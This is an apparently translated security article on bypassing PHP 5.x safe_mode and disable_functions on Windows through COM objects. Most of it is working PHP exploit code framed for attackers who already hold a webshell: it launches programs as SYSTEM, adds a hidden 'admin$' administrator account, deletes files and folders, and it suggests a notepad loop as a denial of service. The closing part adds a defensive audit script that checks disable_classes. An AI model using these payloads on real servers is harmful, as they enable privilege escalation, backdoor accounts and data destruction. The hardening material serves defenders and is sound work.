PHP stands for Hypertext Preprocessor. It is a scripting language embedded in HTML that executes dynamic web pages faster than CGI or Perl. PHP is very capable: anything CGI or JavaScript can do can be implemented in PHP, and it supports almost all popular databases and operating systems. Recently a serious vulnerability was disclosed in this powerful and widely used language: the PHP 5.x COM functions safe_mode and disable_functions bypass. It allows the privilege escalation that so many people dream of. Below is an overview of the vulnerability; my knowledge is limited, so please forgive any inaccuracies.

The COM functions the vulnerability relies on exist only in PHP on Windows, and .NET support requires PHP 5 and the .NET runtime. These functions need no special installation: they are part of the PHP core, so a default Windows build of PHP supports them and no additional extension has to be loaded to call them. Many large and medium-sized sites currently like to run PHP + Apache + Windows, which leaves them exposed to this vulnerability; with privilege escalation getting harder and harder, I expect many servers to fall to it.

According to the discoverer, exploitation requires the following settings in php.ini. My test environment was PHP 5.2.3 + Apache 2.2.3 + Windows XP SP2, and in my tests I found that the configuration does not have to match exactly; you can verify this yourself.
safe_mode = On
disable_functions = com_load_typelib
open_basedir = htdocs
Next, let's look at the details of the vulnerability and how it is exploited.

The RunApplication function in compatUI.dll

The test code for this vulnerability is as follows.
<?php
$compatUI = new COM("{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}"); // load compatUI.dll
$compatUI->RunApplication("something", "notepad.exe", 1); // run notepad
?>
Save it as a PHP file, put it on the server, and open it in IE. IE shows no output after the request, as shown in Figure 1, but notepad is in fact already running, and it runs with SYSTEM privileges: it was started by the web service running as SYSTEM and inherited that account, as shown in Figure 2.

With this vulnerability, we can run a trojan that has already been uploaded and thereby escalate the privileges of the WebShell. Of course, if you are bored enough, you can also write a loop that makes the server launch a large number of notepad instances, which amounts to a DoS.

Running commands through WScript.Shell

The test code for this vulnerability is as follows.
<?php
$wscript = new COM("WScript.Shell"); // uses wscript.exe
$wscript->Run("cmd.exe /c calc.exe"); // run calc.exe
?>
After the script is accessed, a calc.exe process running as SYSTEM appears on the server, as shown in Figure 3. We only need to use some imagination and modify the script, for example to add an administrator account. The code is as follows.
<?php
$wscript = new COM("WScript.Shell");
$wscript->Run("cmd.exe /c net user admin$ /add");
$wscript->Run("cmd.exe /c net localgroup administrators admin$ /add");
?>
After accessing the script, the administrator account is added successfully. This is the nightmare that running as SYSTEM makes possible, as shown in Figure 4.

OpenTextFile in wshom.ocx

OpenTextFile can be used to create a file. The test code for the vulnerability is as follows.
<?php
$mPath = str_repeat("..\\", 20);
$FSO = new COM("Scripting.FileSystemObject"); // uses wshom.ocx
// Create a file on the server: although this method opens a file, it creates it
// when it does not exist (iomode 8 = ForAppending, create = true).
$FSO->OpenTextFile($mPath . "bat.bat", 8, true);
?>
The batch file bat.bat appears in the root directory of drive C, as shown in Figure 5.

DeleteFile in wshom.ocx

This function deletes files on the server, so be careful when testing it. The test code is as follows.
<?php
$mPath = str_repeat("..\\", 20);
$FSOdelFile = new COM("Scripting.FileSystemObject"); // uses wshom.ocx
$FSOdelFile->DeleteFile($mPath . ".\\*.dat", true); // delete all .dat files in the root directory of drive C
?>
DeleteFolder in wshom.ocx

This function can be used to delete folders on the server. The test code is as follows:
<?php
$mPath = str_repeat("..\\", 20);
$FSOdelFolder = new COM("Scripting.FileSystemObject"); // uses wshom.ocx
$FSOdelFolder->DeleteFolder($mPath . ".\\11", true); // delete the specified folder
?>
After the access, the folder c:\11 is deleted successfully.

Creating an account with the Create function in shgina.dll

The test code for this vulnerability is as follows:
<?php
$user = new COM("{60664CAF-AF0D-0004-A300-5C7D25FF22A0}"); // uses shgina.dll
$user->Create("asd"); // create an account named asd
?>
Note, however, that accounts created through this vulnerability only belong to the Users group, as shown in Figure 6.

That concludes this introduction to exploiting the PHP 5.x COM function vulnerabilities. The test code is provided for reference and can be modified as needed. Remember, though, that the prerequisite for exploiting them is that you already have a WebShell through which to upload the privilege-escalation script.

2cto.com note: the vendor has released an official fix. Please schedule the upgrade promptly.
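From the defender's side, the three settings the article lists (safe_mode, disable_functions, open_basedir) do not stop any of the scripts above, because the work is done by methods of COM objects rather than by PHP functions. The control that does apply is PHP's disable_classes directive, which can blacklist the internal COM and DOTNET classes so that new COM(...) fails; com.allow_dcom is a related setting worth keeping Off. The audit script below is an added example and is not part of the original article or of PHP itself. It reports whether the interpreter it runs under still exposes the COM class and whether disable_classes covers it, and first shows the result for the article's own test configuration reconstructed as constructed input. The file name com_exposure_check.php and the OK/RISK/FIX/WARN labels are the example's own choices; it avoids PHP 5.4+ syntax so that it also runs on the PHP 5.2 build the article was tested against.

```php
<?php
// com_exposure_check.php (added defensive example, not from the original article).
// Reports whether this PHP installation still lets scripts instantiate COM
// objects, which every snippet in the article relies on, and whether php.ini's
// disable_classes directive covers the COM and DOTNET classes.
// Run it with the web server's php.ini, e.g.:
//   php -c C:\path\to\php.ini com_exposure_check.php

// Split a comma- or whitespace-separated ini list into lower-cased names.
function parseIniList($value)
{
    $items = preg_split('/[\s,]+/', trim((string) $value), -1, PREG_SPLIT_NO_EMPTY);
    return array_map('strtolower', $items);
}

// Core assessment, kept free of ini_get() so it can be exercised with
// constructed inputs. Returns a list of finding strings.
function assessComExposure($comClassRegistered, $disableClasses, $allowDcom)
{
    $disabled = parseIniList($disableClasses);
    $missing  = array_values(array_diff(array('com', 'dotnet'), $disabled));
    $findings = array();

    if (!$comClassRegistered) {
        $findings[] = 'OK: no COM class is registered (non-Windows build or com_dotnet not loaded).';
    } elseif (count($missing) === 0) {
        $findings[] = 'OK: COM and DOTNET are listed in disable_classes, so new COM(...) fails.';
    } else {
        $findings[] = 'RISK: scripts can create COM objects; safe_mode, disable_functions and '
                    . 'open_basedir do not apply to methods called on them.';
        $findings[] = 'FIX: set in php.ini: disable_classes = COM, DOTNET (missing: '
                    . implode(', ', $missing) . ')';
    }
    if ($allowDcom) {
        $findings[] = 'WARN: com.allow_dcom = On lets PHP act as a DCOM client; turn it Off unless required.';
    }
    return $findings;
}

// Read the live settings of the interpreter running this script.
function liveConfig()
{
    return array(
        // disable_classes leaves the class registered but uninstantiable, so
        // class_exists() alone cannot tell whether the mitigation is in place;
        // both values are therefore passed to the assessment.
        'comClassRegistered' => class_exists('COM', false),
        'disableClasses'     => (string) ini_get('disable_classes'),
        'allowDcom'          => filter_var(ini_get('com.allow_dcom'), FILTER_VALIDATE_BOOLEAN),
    );
}

function printFindings($title, array $findings)
{
    echo $title, PHP_EOL;
    foreach ($findings as $line) {
        echo '  ', $line, PHP_EOL;
    }
}

// The article's test configuration, reconstructed (constructed input) from the
// settings it lists: safe_mode=On, disable_functions=com_load_typelib,
// open_basedir=htdocs, on a Windows build with COM built in and no disable_classes.
printFindings('Article test environment (constructed):', assessComExposure(true, '', false));

// The same environment after adding the recommended disable_classes line.
printFindings('Hardened php.ini (constructed):', assessComExposure(true, 'COM, DOTNET', false));

// Finally, the interpreter this script is running under.
$live = liveConfig();
printFindings('This PHP interpreter (' . PHP_VERSION . '):',
    assessComExposure($live['comClassRegistered'], $live['disableClasses'], $live['allowDcom']));
```

The assessment is split from the ini_get() calls on purpose: the same function grades the article's environment, the hardened one and the live interpreter, so a reader can see that only disable_classes changes the outcome while safe_mode, disable_functions and open_basedir are irrelevant to it.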